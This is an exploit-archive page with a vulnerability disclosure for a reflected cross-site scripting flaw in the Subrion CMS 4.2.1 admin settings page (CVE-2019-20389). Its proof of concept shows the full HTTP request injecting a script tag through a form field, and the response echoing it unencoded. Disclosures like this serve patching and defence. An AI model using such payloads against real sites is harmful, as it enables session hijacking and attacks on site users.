what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Subrion CMS 4.2.1 Cross Site Scripting

Subrion CMS 4.2.1 Cross Site Scripting
Posted May 14, 2020
Authored by Christian Bortone

Subrion CMS version 4.2.1 suffers from a cross site scripting vulnerability.

tags | exploit, xss
advisories | CVE-2019-20389
SHA-256 | c760d917d81d34d580397b055e037a283e8d872ee1d8630fe691097924cfa19a

Subrion CMS 4.2.1 Cross Site Scripting

Change Mirror Download
# Title: Subrion CMS 4.2.1 Cross-Site Scripting (XSS)
# Date: 02-12-2019
# Author: Christian Bortone
# Contact: christianbortone@gmail.com
# Vendor Homepage: https://subrion.org/
# Vulnerable Product: Subrion CMS 4.2.1
# CVE : CVE-2019-20389



1. Description:

A cross-site scripting vulnerability was identified in Subrion CMS settings page. A remote attacker can inject arbitrary Javascript code in the multipart/form-data, which is reflected back within a user's browser without proper output encoding.


2. Proof of Concept:

-------REQUEST-------

POST /subrion/panel/configuration/general/ HTTP/1.1
Host: localhost
Content-Length: 2270
Cache-Control: max-age=0
Origin: http://localhost
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryYsVEcg0mHqDrQoAg
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.0 Safari/537.36 autochrome/red
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://localhost/subrion/panel/configuration/general/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: INTELLI_64e9af8d7f=9d3b0b32b40a06ddf509f7e646e29397; loader=loaded
Connection: close

...

Content-Disposition: form-data; name="v[language_switch]"

"><script>alert(1)</script>

...

-------RESPONSE-------

HTTP/1.1 200 OK
Date: Mon, 02 Dec 2019 19:04:08 GMT
Server: Apache/2.4.39 (Unix) OpenSSL/1.0.2s PHP/7.1.30 mod_perl/2.0.8-dev Perl/v5.16.3
X-Powered-By: PHP/7.1.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: INTELLI_64e9af8d7f=bc8d4b54fe37565e2ca7f4521c05ecb5; expires=Mon, 02-Dec-2019 19:34:08 GMT; Max-Age=1800; path=/
X-Robots-Tag: noindex
Vary: Accept-Encoding
Content-Length: 104140
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE html>
<html lang="en" dir="ltr">
<head>

...

<input type="checkbox" name="v[language_switch]" id="language_switch" value=""><script>alert(1)</script>" checked>

...


Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    8 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    11 Files
  • 23
    Apr 23rd
    68 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close